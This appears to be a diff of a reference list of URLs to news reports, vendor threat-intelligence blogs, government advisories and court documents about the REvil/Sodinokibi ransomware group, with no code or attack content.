- "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
- "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2",
- "https://www.hsgac.senate.gov/media/minority-media/new-portman-report-demonstrates-threat-ransomware-presents-to-the-united-states",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/",
- "https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/",
- "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
- "https://www.bleepingcomputer.com/news/security/another-ransomware-will-now-publish-victims-data-if-not-paid/",
- "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
- "https://cti-league.com/wp-content/uploads/2021/02/CTI-League-Darknet-Report-2021.pdf",
- "https://ke-la.com/easy-way-in-5-ransomware-victims-had-their-pulse-secure-vpn-credentials-leaked/",
- "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware",
- "https://www.elastic.co/blog/ransomware-interrupted-sodinokibi-and-the-supply-chain",
- "https://www.bleepingcomputer.com/news/security/kaseyas-universal-revil-decryption-key-leaked-on-a-hacking-forum/",
- "https://blog.amossys.fr/sodinokibi-malware-analysis.html",
- "https://news.sophos.com/en-us/2022/03/17/the-ransomware-threat-intelligence-center/",
- "https://raw.githubusercontent.com/k-vitali/Malware-Misc-RE/master/2022-05-01-revil-reborn-ransom.vk.cfg.txt",
- "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/",
- "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/",
- "https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/",
- "https://www.cybereason.com/blog/cybereason-vs-revil-ransomware-the-kaseya-chronicles",
- "https://www.br.de/nachrichten/deutschland-welt/mutmasslicher-ransomware-millionaer-identifiziert,Sn3iHgJ",
- "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html",
- "https://www.youtube.com/watch?v=QYQQUUpU04s",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
- "https://twitter.com/_alex_il_/status/1412403420217159694",
- "https://www.washingtonpost.com/national-security/ransomware-fbi-revil-decryption-key/2021/09/21/4a9417d0-f15f-11eb-a452-4da5fe48582d_story.html",
- "https://unit42.paloaltonetworks.com/revil-threat-actors/",
- "https://www.cert.ssi.gouv.fr/cti/CERTFR-2021-CTI-009/",
- "https://krebsonsecurity.com/2021/11/revil-ransom-arrest-6m-seizure-and-10m-reward/",
- "https://community.riskiq.com/article/3315064b",
- "https://public.intel471.com/blog/revil-ransomware-interview-russian-osint-100-million/",
- "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
- "https://www.trendmicro.com/en_us/research/21/h/supply-chain-attacks-from-a-managed-detection-and-response-persp.html",
- "https://www.tgsoft.it/english/news_archivio_eng.asp?id=1004",
- "https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself",
- "https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
- "https://blogs.blackberry.com/en/2021/11/revil-under-the-microscope",
- "https://teamt5.org/tw/posts/revil-dll-sideloading-technique-used-by-other-hackers/",
- "https://www.justice.gov/opa/pr/ukrainian-arrested-and-charged-ransomware-attack-kaseya",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/",
- "https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/",
- "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
- "https://www.trendmicro.com/en_us/research/20/l/the-impact-of-modern-ransomware-on-manufacturing-networks.html",
- "https://twitter.com/SophosLabs/status/1413616952313004040?s=20",
- "https://gist.githubusercontent.com/fwosar/a63e1249bfccb8395b961d3d780c0354/raw/312b2bbc566cbee2dac7b143dc143c1913ddb729/revil.json",
- "https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/",
- "https://areteir.com/wp-content/uploads/2020/07/Arete_Insight_Sodino-Ransomware_June-2020.pdf",
- "https://russian.rt.com/russia/article/926347-barnaulec-rozysk-fbr-kibermoshennichestvo",
- "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
- "https://www.elliptic.co/blog/revil-revealed-tracking-ransomware-negotiation-and-payment",
- "https://securelist.com/ransomware-world-in-2021/102169/",
- "https://blog.talosintelligence.com/2021/03/ctir-trends-winter-2020-21.html",
- "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
- "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil",
- "https://home.treasury.gov/news/press-releases/jy0471",
- "https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422",
- "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
- "https://www.zscaler.com/blogs/security-research/kaseya-supply-chain-ransomware-attack-technical-analysis-revil-payload",
- "https://www.connectwise.com/resources/revil-profile",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
- "https://blag.nullteilerfrei.de/2020/02/02/defeating-sodinokibi-revil-string-obfuscation-in-ghidra/",
- "https://www.flashpoint-intel.com/blog/interview-with-revil-affiliated-ransomware-contractor/",
- "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
- "https://www.advanced-intel.com/post/revil-vanishes-from-underground-infrastructure-down-support-staff-adverts-silent",
- "https://news.sophos.com/en-us/2021/06/11/relentless-revil-revealed/",
- "https://analyst1.com/file-assets/History-of-REvil.pdf",
- "https://www.bleepingcomputer.com/news/security/revil-gang-tries-to-extort-apple-threatens-to-sell-stolen-blueprints/",
- "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
- "https://sites.temple.edu/care/ci-rw-attacks/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.kaseya.com/potential-attack-on-kaseya-vsa/",
- "https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/",
- "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/",
- "https://twitter.com/svch0st/status/1411537562380816384",
- "https://www.splunk.com/en_us/pdfs/resources/whitepaper/an-empirically-comparative-analysis-of-ransomware-binaries.pdf",
- "https://www.advanced-intel.com/post/from-qbot-with-revil-ransomware-initial-attack-exposure-of-jbs",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-says-travelex-will-pay-one-way-or-another/",
- "https://ke-la.com/will-the-revils-story-finally-be-over/",
- "https://news.sophos.com/en-us/2021/06/30/what-to-expect-when-youve-been-hit-with-revil-ransomware/",
- "https://twitter.com/VK_Intel/status/1374571480370061312?s=20",
- "https://us-cert.cisa.gov/ncas/current-activity/2021/07/04/cisa-fbi-guidance-msps-and-their-customers-affected-kaseya-vsa",
- "https://twitter.com/SyscallE/status/1411074271875670022",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
- "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf",
- "https://www.bleepingcomputer.com/news/security/a-look-inside-the-highly-profitable-sodinokibi-ransomware-business/",
- "https://www.advanced-intel.com/post/adversarial-perspective-advintel-breach-avoidance-through-monitoring-initial-vulnerabilities",
- "https://www.bleepingcomputer.com/news/security/ransomware-threatens-to-reveal-companys-dirty-secrets/",
- "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/",
- "https://www.netskope.com/blog/netskope-threat-coverage-revil",
- "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317",
- "https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf",
- "https://securelist.com/revil-ransomware-attack-on-msp-companies/103075/",
- "https://threatintel.blog/OPBlueRaven-Part1/",
- "https://www.appgate.com/blog/electric-company-ransomware-attack-calls-for-14-million-in-ransom",
- "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/",
- "https://www.secureworks.com/research/lv-ransomware",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801",
- "https://www.advanced-intel.com/post/inside-revil-extortionist-machine-predictive-insights",
- "https://www.crowdstrike.com/blog/how-falcon-complete-thwarted-a-revil-ransomware-attack/",
- "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/",
- "https://cybersecurity.att.com/blogs/labs-research/revils-new-linux-version",
- "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin",
- "https://twitter.com/LloydLabs/status/1411098844209819648",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
- "https://www.bleepingcomputer.com/news/security/kaseya-obtains-universal-decryptor-for-revil-ransomware-victims/",
- "https://ke-la.com/zooming-into-darknet-threats-targeting-jp-orgs-kela/",
- "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
- "https://www.fincen.gov/sites/default/files/advisory/2021-11-08/FinCEN%20Ransomware%20Advisory_FINAL_508_.pdf",
- "https://therecord.media/an-interview-with-blackmatter-a-new-ransomware-group-thats-learning-from-the-mistakes-of-darkside-and-revil/",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-travelex-demands-3-million/",
- "https://download.microsoft.com/download/f/8/1/f816b8b6-bee3-41e5-b6cc-e925a5688f61/Microsoft_Digital_Defense_Report_2020_September.pdf",
- "https://blog.morphisec.com/real-time-prevention-of-the-kaseya-vsa-supply-chain-revil-ransomware-attack",
- "https://www.acronis.com/en-sg/articles/sodinokibi-ransomware/",
- "https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-gang-rises-from-the-ashes-of-darkside-revil/",
- "https://tehtris.com/fr/peut-on-neutraliser-un-ransomware-lance-en-tant-que-system-sur-des-milliers-de-machines-en-meme-temps/",
- "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://blog.sensecy.com/2020/08/20/global-ransomware-attacks-in-2020-the-top-4-vulnerabilities/",
- "https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-001.pdf",
- "https://www.crowdstrike.com/blog/the-evolution-of-revil-ransomware-and-pinchy-spider/",
- "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/",
- "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter",
- "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
"https://www.youtube.com/watch?v=LUxOcpIRxmg",
- "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/",
- "https://www.splunk.com/en_us/blog/security/revil-ransomware-threat-research-update-and-detections.html",
- "https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-shuts-down-again-after-tor-sites-were-hijacked/",
- "https://velzart.nl/blog/ransomeware/",
- "https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas",
- "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics",
- "https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/",
- "https://hatching.io/blog/ransomware-part2",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://www.zdnet.com/article/revil-ransomware-gang-acquires-kpot-malware/",
- "https://www.youtube.com/watch?v=l2P5CMH9TE0",
- "https://twitter.com/VK_Intel/status/1411066870350942213",
- "https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain",
- "https://twitter.com/R3MRUM/status/1412064882623713283",
- "https://vimeo.com/449849549",
- "https://www.goggleheadedhacker.com/blog/post/reversing-crypto-functions",
- "https://www.flashpoint-intel.com/blog/cl0p-and-revil-escalate-their-ransomware-tactics/",
- "https://www.darkowl.com/blog-content/page-not-found-revil-darknet-services-offline-after-attack-last-weekend",
- "https://blog.group-ib.com/REvil_RaaS",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://therecord.media/i-scrounged-through-the-trash-heaps-now-im-a-millionaire-an-interview-with-revils-unknown/",
- "https://www.flashpoint-intel.com/blog/revils-cryptobackdoor-con-ransomware-groups-tactics-roil-affiliates-sparking-a-fallout/",
- "https://news.sophos.com/en-us/2021/06/30/mtr-in-real-time-hand-to-hand-combat-with-revil-ransomware-chasing-a-2-5-million-pay-day/",
- "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-ransomware-threat-report-2021.pdf",
- "https://securityscorecard.com/research/a-detailed-analysis-of-the-last-version-of-revil-ransomware",
- "https://www.bankinfosecurity.com/interviews/ransomware-files-episode-6-kaseya-revil-i-5045",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-1-000-plus-companies-in-msp-supply-chain-attack/",
- "https://www.secureworks.com/blog/revil-the-gandcrab-connection",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-gangs-web-sites-mysteriously-shut-down/",
- "https://www.flashpoint-intel.com/blog/revil-disappears-again/",
- "https://www.recordedfuture.com/blackmatter-ransomware-successor-darkside-revil/",
- "https://www.secureworks.com/research/revil-sodinokibi-ransomware",
- "https://therecord.media/ransomwhere-project-wants-to-create-a-database-of-past-ransomware-payments/",
- "https://dissectingmalwa.re/germanwipers-big-brother-gandgrabs-kid-sodinokibi.html",
- "https://twitter.com/AdamTheAnalyst/status/1409499591452639242?s=20",
- "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/",
- "https://isc.sans.edu/diary/27012",
- "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/",
- "https://www.goggleheadedhacker.com/blog/post/sodinokibi-ransomware-analysis",
- "https://ke-la.com/ransomware-gangs-are-starting-to-look-like-oceans-11/",
- "https://resources.malwarebytes.com/files/2020/02/2020_State-of-Malware-Report.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-southfield",
- "https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
- "https://www.bbc.com/news/technology-59297187",
- "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
- "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/",
- "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
- "https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses",
- "https://www.proofpoint.com/us/blog/threat-insight/first-step-initial-access-leads-ransomware",
- "https://teamt5.org/en/posts/introducing-the-most-profitable-ransomware-revil/",
- "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/",
- "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/",
- "https://www.kpn.com/security-blogs/Tracking-REvil.htm",
- "https://www.reuters.com/technology/exclusive-governments-turn-tables-ransomware-gang-revil-by-pushing-it-offline-2021-10-21/",
- "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
- "https://storage.courtlistener.com/recap/gov.uscourts.txnd.352371/gov.uscourts.txnd.352371.1.0_1.pdf",
- "https://www.ironnet.com/blog/ransomware-graphic-blog",
- "https://www.digitalshadows.com/blog-and-research/competitions-on-russian-language-cybercriminal-forums-sharing-expertise-or-threat-actor-showboating/",
- "https://diicot.ro/mass-media/3341-comunicat-de-presa-2-08-11-2021",
- "https://us-cert.cisa.gov/ncas/alerts/aa20-345a",
- "https://www.bleepingcomputer.com/news/security/revil-ransomware-returns-new-malware-sample-confirms-gang-is-back/",
- "https://asec.ahnlab.com/ko/19640/",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://redcanary.com/blog/uncompromised-kaseya/",
- "https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/",
- "https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout",
- "https://www.grahamcluley.com/travelex-paid-ransom/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion",
- "https://drive.google.com/file/d/1ph1E0onZ7TiNyG87k4WjofCKNuCafMLk/view",
- "https://threatpost.com/ransomware-revil-sites-disappears/167745/",
- "https://blog.redteam.pl/2020/05/sodinokibi-revil-ransomware.html",
- "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-to-stop-taking-bitcoin-to-hide-money-trail/",
- "https://www.pandasecurity.com/emailhtml/2007-CAM-RANSOMWARE-AD360-WG/2006-Report-Sodinokibi-EN.pdf",
- "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html",
- "http://www.fsb.ru/fsb/press/message/single.htm%21id%3D10439388%40fsbMessage.html",
- "https://www.trendmicro.com/en_us/research/21/a/sodinokibi-ransomware.html",
- "https://thehackernews.com/2022/03/ukrainian-hacker-linked-to-revil.html",
- "https://www.bleepingcomputer.com/news/security/fbi-revil-cybergang-behind-the-jbs-ransomware-attack/",
- "https://twitter.com/fwosar/status/1420119812815138824",
- "https://www.domaintools.com/resources/blog/the-most-prolific-ransomware-families-a-defenders-guide",
- "https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/",
- "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
- "https://twitter.com/fwosar/status/1411281334870368260",
- "http://www.secureworks.com/research/threat-profiles/gold-southfield",
- "https://asec.ahnlab.com/ko/19860/",
- "https://twitter.com/Jacob_Pimental/status/1391055792774729728",
- "https://www.splunk.com/en_us/blog/security/kaseya-sera-what-revil-shall-encrypt-shall-encrypt.html",
- "https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/",
- "https://searchsecurity.techtarget.com/feature/Ransomware-negotiations-An-inside-look-at-the-process",
- "https://www.cyjax.com/2021/07/09/revilevolution/",
- "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/",
- "https://therecord.media/us-arrests-and-charges-ukrainian-man-for-kaseya-ransomware-attack/",
- "https://twitter.com/Jacob_Pimental/status/1398356030489251842?s=20",
- "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-1/",
- "https://twitter.com/SophosLabs/status/1412056467201462276",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/",
- "https://ke-la.com/darknet-threat-actors-are-not-playing-games-with-the-gaming-industry/",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-threatens-to-publish-data-of-automotive-group/",
- "https://www.trendmicro.com/en_in/research/21/k/global-operations-lead-to-arrests-of-alleged-members-of-gandcrab.html",
- "https://ke-la.com/how-ransomware-gangs-find-new-monetization-schemes-and-evolve-in-marketing/",
+ "https://unit42.paloaltonetworks.com/revil-threat-actors/",
"https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-has-a-new-windows-safe-mode-encryption-mode/",
+ "https://twitter.com/VK_Intel/status/1374571480370061312?s=20",
+ "https://www.advintel.io/post/storm-in-safe-haven-takeaways-from-russian-authorities-takedown-of-revil",
+ "https://www.secureworks.com/blog/revil-development-adds-confidence-about-gold-southfield-reemergence?linkId=164334801",
+ "https://awakesecurity.com/blog/threat-hunting-for-revil-ransomware/",
+ "https://blag.nullteilerfrei.de/2019/11/09/api-hashing-why-and-how/",
+ "https://www.grahamcluley.com/travelex-paid-ransom/",
+ "https://www.secureworks.com/blog/revil-the-gandcrab-connection",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-publishes-stolen-data-for-the-first-time/",
+ "https://www.flashpoint-intel.com/blog/darkside-ransomware-links-to-revil-difficult-to-dismiss/",
+ "https://www.nytimes.com/2019/08/22/us/ransomware-attacks-hacking.html",
+ "https://asec.ahnlab.com/ko/19640/",
+ "https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-hits-managedcom-hosting-provider-500k-ransom/",
+ "https://blog.gigamon.com/2021/07/08/observations-and-recommendations-from-the-ongoing-revil-kaseya-incident/",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-may-tip-nasdaq-on-attacks-to-hurt-stock-prices/",
+ "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/",
+ "https://www.bleepingcomputer.com/news/security/revils-tor-sites-come-alive-to-redirect-to-new-ransomware-operation/",
+ "https://www.secureworks.com/blog/revil-ransomware-reemerges-after-shutdown-universal-decryptor-released",
+ "https://www.kaseya.com/potential-attack-on-kaseya-vsa/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-gang-claims-over-100-million-profit-in-a-year/",
+ "https://www.cnbc.com/2021/04/23/axis-of-revil-inside-the-hacker-collective-taunting-apple.html",
+ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sodinokibi-ransomware-cobalt-strike-pos",
+ "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound",
+ "https://www.crowdstrike.com/blog/double-trouble-ransomware-data-leak-extortion-part-2/",
+ "https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/",
+ "https://securityaffairs.co/wordpress/98694/malware/sodinokibi-kenneth-cole-data-breach.html",
+ "https://www.documentcloud.org/documents/21505031-hgsac-staff-report-americas-data-held-hostage-032422",
+ "https://blog.truesec.com/2021/07/06/kaseya-vsa-zero-day-exploit",
+ "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
+ "https://f.hubspotusercontent10.net/hubfs/5943619/Whitepaper-Downloads/Ransomware_in_ICS_Environments_Whitepaper_10_12_20.pdf",
+ "https://www.huntandhackett.com/blog/advanced-ip-scanner-the-preferred-scanner-in-the-apt-toolbox",
+ "https://unit42.paloaltonetworks.com/prometheus-ransomware/",
+ "https://www.justice.gov/opa/pr/sodinokibirevil-ransomware-defendant-extradited-united-states-and-arraigned-texas",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain",
+ "https://www.netskope.com/blog/netskope-threat-coverage-revil",
+ "https://vulnerability.ch/2021/04/ransomware-and-date-leak-site-publication-time-analysis/",
+ "https://www.bleepingcomputer.com/news/security/sodinokibi-ransomware-hits-new-york-airport-systems/",
+ "http://www.secureworks.com/research/threat-profiles/gold-southfield",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://blogs.blackberry.com/en/2021/05/threat-thursday-dr-revil-ransomware-strikes-again-employs-double-extortion-tactics",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-as-a-service-enabler-of-widespread-attacks",
+ "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-double-extortion-and-beyond-revil-clop-and-conti",
+ "https://www.fbi.gov/wanted/cyber/yevgyeniy-igoryevich-polyanin",
+ "https://cybleinc.com/2021/07/03/uncensored-interview-with-revil-sodinokibi-ransomware-operators/",
+ "https://www.elastic.co/blog/elastic-security-prevents-100-percent-of-revil-ransomware-samples?utm_content=&utm_medium=social&utm_source=twitter",
+ "https://medium.com/s2wlab/w4-may-en-story-of-the-week-ransomware-on-the-darkweb-5f5b8d4c3b6f",
+ "https://www.bbc.com/news/technology-59297187",
+ "https://medium.com/s2wlab/deep-analysis-of-revil-ransomware-written-in-korean-d1899c0e9317",
+ "https://ics-cert.kaspersky.com/media/KASPERSKY_H1_2020_ICS_REPORT_EN.pdf",
+ "https://twitter.com/Jacob_Pimental/status/1391055792774729728",
+ "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_1_tamada-yamazaki-nakatsuru_en.pdf",
+ "https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf",
+ "https://krebsonsecurity.com/2019/07/is-revil-the-new-gandcrab-ransomware/",
+ "https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf",
+ "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomwares-servers-mysteriously-come-back-online/",
+ "https://www.ironnet.com/blog/ransomware-graphic-blog",
+ "https://unit42.paloaltonetworks.com/threat-brief-kaseya-vsa-ransomware-attacks/",
+ "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-revil",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-stops-revil-ransomware-from-kaseya-attack/",
+ "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3",
+ "https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
+ "https://www.advanced-intel.com/post/the-dark-web-of-intrigue-how-revil-used-the-underground-ecosystem-to-form-an-extortion-cartel",
+ "https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/",
+ "https://www.bleepingcomputer.com/news/security/revil-ransomware-devs-added-a-backdoor-to-cheat-affiliates/",
+ "https://www.youtube.com/watch?v=l2P5CMH9TE0",
+ "https://www.flashpoint-intel.com/blog/possible-universal-revil-master-key-posted-to-xss/",
+ "https://www.darktrace.com/en/blog/staying-ahead-of-r-evils-ransomware-as-a-service-business-model/",
+ "https://www.zdnet.com/article/revil-ransomware-gang-launches-auction-site-to-sell-stolen-data/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/wp-spark-state-of-ransomware.pdf",
+ "https://medium.com/@underthebreach/tracking-down-revils-lalartu-by-utilizing-multiple-osint-methods-2bf3a6c65a80",
+ "https://blog.malwarebytes.com/threat-analysis/2020/11/german-users-targeted-with-gootkit-banker-or-revil-ransomware/",
+ "https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/",
+ "https://www.bleepingcomputer.com/news/security/new-jersey-synagogue-suffers-sodinokibi-ransomware-attack/",
